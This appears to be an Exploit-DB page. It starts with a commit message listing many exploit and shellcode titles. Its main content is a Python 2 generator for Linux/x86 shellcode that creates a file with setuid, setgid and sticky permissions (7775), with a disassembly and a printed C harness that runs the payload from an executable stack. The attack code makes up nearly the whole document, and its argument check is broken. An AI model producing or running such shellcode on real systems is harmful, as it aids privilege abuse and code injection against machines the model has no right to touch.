880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
72 lines
No EOL
2.5 KiB
Python
Executable file
72 lines
No EOL
2.5 KiB
Python
Executable file
#!/bin/python
|
|
from sys import argv
|
|
|
|
"""
|
|
Shellcode Generator...
|
|
Create file with permission 7775
|
|
|
|
---------------------------------------------------------------------------------
|
|
Disassembly of section .text:
|
|
|
|
08048060 <.text>:
|
|
8048060: eb 12 jmp 0x8048074
|
|
8048062: 5b pop %ebx
|
|
8048063: 31 c0 xor %eax,%eax
|
|
8048065: 88 43 05 mov %al,0x5(%ebx)
|
|
8048068: b0 08 mov $0x8,%al
|
|
804806a: b1 ff mov $0xff,%cl
|
|
804806c: b5 ff mov $0xff,%ch
|
|
804806e: cd 80 int $0x80
|
|
8048070: b0 01 mov $0x1,%al
|
|
8048072: cd 80 int $0x80
|
|
8048074: e8 e9 ff ff ff call 0x8048062
|
|
8048079: 61 popa
|
|
804807a: 6a 69 push $0x69
|
|
804807c: 74 68 je 0x80480e6
|
|
804807e: 23 .byte 0x23
|
|
---------------------------------------------------------------------------------
|
|
b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com
|
|
|
|
Om Asato Maa Sad-Gamaya |
|
|
Tamaso Maa Jyotir-Gamaya |
|
|
Mrtyor-Maa Amrtam Gamaya |
|
|
Om Shaantih Shaantih Shaantih |
|
|
"""
|
|
|
|
bann3r = '''
|
|
/*
|
|
[][][][][][][][][][][][][][][][][][][][][][][]
|
|
[] []
|
|
[] c0d3d by Ajith Kp [ajithkp560] []
|
|
[] http://www.terminalcoders.blogspot.in []
|
|
[] []
|
|
[][][][][][][][][][][][][][][][][][][][][][][]
|
|
*/
|
|
'''
|
|
sh3ll = "\\xeb\\x12\\x5b\\x31\\xc0\\x88\\x43"
|
|
sh311 ="\\xb0\\x08\\xb1\\xff\\xb5\\xff\\xcd\\x80\\xb0\\x01\\xcd\\x80\\xe8\\xe9\\xff\\xff\\xff"
|
|
print bann3r
|
|
if len(argv)<1:
|
|
print 'Usage: '+argv[0]+' name_of_file'
|
|
else:
|
|
fil3 = argv[1]
|
|
h3x = ''
|
|
for i in range(len(fil3)):
|
|
h3x+=str('\\'+hex(ord(fil3[i]))[1:])
|
|
h3x+=str('\\' + 'x23')
|
|
l3n = '\\x'+hex((len(fil3)))[2:].zfill(2)
|
|
sh = str(sh3ll) + str(l3n) + str(sh311) + str(h3x)
|
|
print '// Compile with'
|
|
print '// $ gcc -o output source.c'
|
|
print '// $ execstack -s output'
|
|
print '// $ ./output'
|
|
print '////////////////////////////////////////////\n'
|
|
print '# include <stdio.h>'
|
|
print 'char sh[] = "'+sh+'";'
|
|
print 'main(int argc, char **argv)'
|
|
print '''{
|
|
int (*func)();
|
|
func = (int (*)()) sh;
|
|
(int)(*func)();'''
|
|
print '}'
|
|
print '\n////////////////////////////////////////////' |